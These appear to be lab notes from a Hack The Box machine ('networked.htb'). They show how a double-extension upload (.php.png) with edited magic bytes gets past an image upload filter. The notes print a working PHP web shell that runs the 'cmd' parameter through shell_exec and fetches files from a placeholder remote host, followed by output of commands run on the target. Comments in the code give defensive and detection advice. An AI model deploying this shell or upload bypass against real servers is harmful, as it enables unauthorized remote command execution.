3 :80 upload.php & lib.php
# file: upload.php
upload dir: /var/www/html/uploads/
POST submit:
check_file_type => Content-Type: image/*
check_file_size => size < 60000
return invalid image - break
if valid image:
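name = client IP with '.' replaced by '_', then '.' + ext | 10_10_16_7.php.png (ext comes from getnameUpload in lib.php and is everything after the first '.', so the inner ".php" is kept)
move uploaded file to upload_dir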
chmod 644 file
# file: lib.php
getnameUpload($filename) | k.php.png
pieces = array(split on '.') | [k, php, png]
name = pieces[0] | k
name = replace '_' with '.' | k
ext = remove the 1st element, then join the remaining pieces with '.' | php.png
return name, ext
# tried the basic shell
<?php
// Test payload used in these notes: a two-function PHP web shell.
// It only does anything if the web server passes the containing file to the
// PHP interpreter. Per the notes it was stored as 10_10_16_7.php.png under
// /var/www/html/uploads/ and still ran, so the underlying flaw is the server
// executing an upload whose name merely contains ".php".
// NOTE(review): presumably a PHP handler rule matching ".php" anywhere in the
// file name - confirm against the Apache/PHP handler configuration.
//
// Defensive takeaways:
//  - serve the upload directory with script execution disabled, or store
//    uploads outside the web root;
//  - have the server generate the stored name with one allowlisted extension
//    instead of keeping everything after the first '.';
//  - detection: requests carrying a `cmd` or `fupload` parameter to paths
//    under /uploads/, shell processes spawned by the apache user, and
//    outbound HTTP fetches from the web server.

// Passes the `cmd` request parameter unmodified to shell_exec() and echoes the
// command output wrapped in <pre>. Has no effect when shell_exec is listed in
// disable_functions.
if (isset($_REQUEST['cmd'])) {
echo "<pre>" . shell_exec($_REQUEST['cmd']) . "</pre>";
}
// Downloads http://IP/<fupload> and writes it to the local path named by the
// same `fupload` parameter ("IP" is a placeholder in these notes). The remote
// read depends on allow_url_fopen being enabled; the write lands wherever the
// web server user has write permission.
if (isset($_REQUEST['fupload'])) {
file_put_contents($_REQUEST['fupload'], file_get_contents('http://IP/' . $_REQUEST['fupload']));
};
?>
# can see the file but cannot run commands
# trying the webshell
# added 16 X on top
# hexeditor to change magic bytes
# upload successful >
http://networked.htb/uploads/10_10_16_7.php.png
CMD: whoami;id;hostname;uname -a
apache
uid=48(apache) gid=48(apache) groups=48(apache)
networked.htb
Linux networked.htb 3.10.0-957.21.3.el7.x86_64 #1 SMP Tue Jun 18 16:35:19 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux